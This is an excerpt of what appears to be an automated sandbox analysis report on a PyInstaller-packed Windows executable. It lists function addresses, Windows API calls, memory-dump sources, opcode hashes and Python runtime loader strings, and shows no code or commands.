                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,00007FF7ACE99DD5,?,?,00000000,00007FF7ACE99E8A), ref: 00007FF7ACE99FC6
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE99DD5,?,?,00000000,00007FF7ACE99E8A), ref: 00007FF7ACE99FD0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                            • Opcode ID: ac9e98b412a5961d7460aa12ad0ec3afb474dab09b1a01e5b31658786db65771
                                                                                                                                                                                                            • Instruction ID: f212e00d94b546897feb5dbb36810383f54acc7c504cc42195d00a107fbcb905
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac9e98b412a5961d7460aa12ad0ec3afb474dab09b1a01e5b31658786db65771
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21A431F1E64261FA90B725948127DD6929F447A0F8A42B5F92F673F1CE6CE8454320
                                                                                                                                                                                                            Function 00007FF7ACE9B2AC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 59b3af13fe784cb7670022fdd077a90ad3e77dba11ba07e1d20d2cc9a011fd15
                                                                                                                                                                                                            • Instruction ID: 502f9ef47861c96b455c7ba7470b68fe3d803cfc4eef2d7cb42edda025b797f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59b3af13fe784cb7670022fdd077a90ad3e77dba11ba07e1d20d2cc9a011fd15
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A541E33291E24197EA34EB29A44027DF3A0EB55B80F910571EB8EA36A1CF6DE502C761
                                                                                                                                                                                                            Function 00007FF7ACE87170 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                            • Opcode ID: e4d8a0f1ae197e99e10617596f9b91763f42da5e258ac1e7408b852b43e9147c
                                                                                                                                                                                                            • Instruction ID: 216a54b04a4388f508cd47263ae70df9a4cdc44f0bfe7c0f40d6410a4c57451f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4d8a0f1ae197e99e10617596f9b91763f42da5e258ac1e7408b852b43e9147c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1217E71B0E292A5EA50BB5266047BAF651BF45BD5FCA4031FE0D277A6CE7DE041C320
                                                                                                                                                                                                            Function 00007FF7ACE9AD3C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 7d59e4c40900bb32387b6d96138c4a28a58e0b2ab210e317c35ca26ebe7fd99a
                                                                                                                                                                                                            • Instruction ID: d257121954ad7f83b24e13496ab3e6114e1ae586e19b04122d7d6aa0df7398fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d59e4c40900bb32387b6d96138c4a28a58e0b2ab210e317c35ca26ebe7fd99a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84319031A1E612A5E751BB25884037CF690AF51B95F8206B5FA2D233F2CF7CE8518370
                                                                                                                                                                                                            Function 00007FF7ACE953F8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                            • Instruction ID: e56de3a77e36c1109090171b7aa4f20373f0aa374b694d8b0763171c483218bf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA119331A0F64591EE60FF51940127DE3A0BF85B80F8A4675FA8C676AACFBDE5008760
                                                                                                                                                                                                            Function 00007FF7ACEA568C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 517f1388def26b6ea6af1a1c77ba5c260dc8b33e60c43458f0534b05beae82e8
                                                                                                                                                                                                            • Instruction ID: 59a8da97437db0539e2e6704cbed3f6fc7c3595fe59d22822e997818f70c412e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 517f1388def26b6ea6af1a1c77ba5c260dc8b33e60c43458f0534b05beae82e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC21C57260EA419BDB61EF28E440379B6A0EB84B95F994234E65D576F5DF3CD8008B10
                                                                                                                                                                                                            Function 00007FF7ACE8F54C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
                                                                                                                                                                                                            • Instruction ID: b4486ace17705be3bfb908ee76cdba10baf2b813e84337ec68bad77fef89bb56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2018271A0D78250EA04EF626A00069E791BF85FE0F894631EE5C67BE6CE3CD5114310
                                                                                                                                                                                                            Function 00007FF7ACE9DC70 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF7ACE9A7E6,?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E), ref: 00007FF7ACE9DCC5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                            • Opcode ID: 706319e4b74843d5ad32e6c0b7fb19fe3c01a362d6ca9e09dab64425b174a517
                                                                                                                                                                                                            • Instruction ID: 336b29164cc2f0936125791fc1be451abe7c01209f9269399e311732448441cb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 706319e4b74843d5ad32e6c0b7fb19fe3c01a362d6ca9e09dab64425b174a517
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BF04970B0F31661FE54B66198503B8D6806F49B80F8E4470E90EFA3B1EEACE6908230
                                                                                                                                                                                                            Function 00007FF7ACE9C9FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF7ACE8FD74,?,?,?,00007FF7ACE91286,?,?,?,?,?,00007FF7ACE92879), ref: 00007FF7ACE9CA3A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                            • Opcode ID: 489c3d0cd44d140bc65b640a77535ff6cb9a2f4134c0d54aac00f59d377539c0
                                                                                                                                                                                                            • Instruction ID: ebfe9ee3236785c6688cc4bdd14591d709b8394d160fcda48212b523ced5d4e0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 489c3d0cd44d140bc65b640a77535ff6cb9a2f4134c0d54aac00f59d377539c0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF05E30B0F38665FE64B6B15850278D1805F447E1F8A0670EC2FB53F2DEACE4409130

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00007FF7ACE83DD0 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                            • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                                                            • API String ID: 190572456-3109299426
                                                                                                                                                                                                            • Opcode ID: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
                                                                                                                                                                                                            • Instruction ID: 18214d0df65889b5a8c88de98d60f10d03da459692f6e550886dbe3ef67501c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC42E778A0FB43B5EA55AF19A890174B7A5AF04786BDA5135C80E3A2B4FF7CF514C320
                                                                                                                                                                                                            Function 00007FF7ACE81B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                            • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                            • API String ID: 2446303242-1601438679
                                                                                                                                                                                                            • Opcode ID: 051afb74dd6d8b2a6ec501d8fa5556287ab5d0c90ea366ccf65a0a970d90b360
                                                                                                                                                                                                            • Instruction ID: 495748766eb145c82c20611f05ccf26b03c7e39802db9555aae69d9cf8f09550
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 051afb74dd6d8b2a6ec501d8fa5556287ab5d0c90ea366ccf65a0a970d90b360
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33A17A32209B819BE7149F11E5847AEB370F788B81F914129EB8D23B24CF7DE569CB50
                                                                                                                                                                                                            Function 00007FF7ACEA30FC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                                            • Opcode ID: 3af33b1c53459be822e3926673cf8556ce12eec6cba7b9f0bf56be9fb2bd3e29
                                                                                                                                                                                                            • Instruction ID: bf05d4bef82292c95d6637168a0cca6ec4fa7c50a620d6ccd8a1be50fe4f199d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3af33b1c53459be822e3926673cf8556ce12eec6cba7b9f0bf56be9fb2bd3e29
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BB22472E1D2829FE7249E68D4407FDB7A1FB4438AF895135DA0D67AA4DF38E900CB50
                                                                                                                                                                                                            Function 00007FF7ACE87420 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87447
                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87476
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF7ACE874CC
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
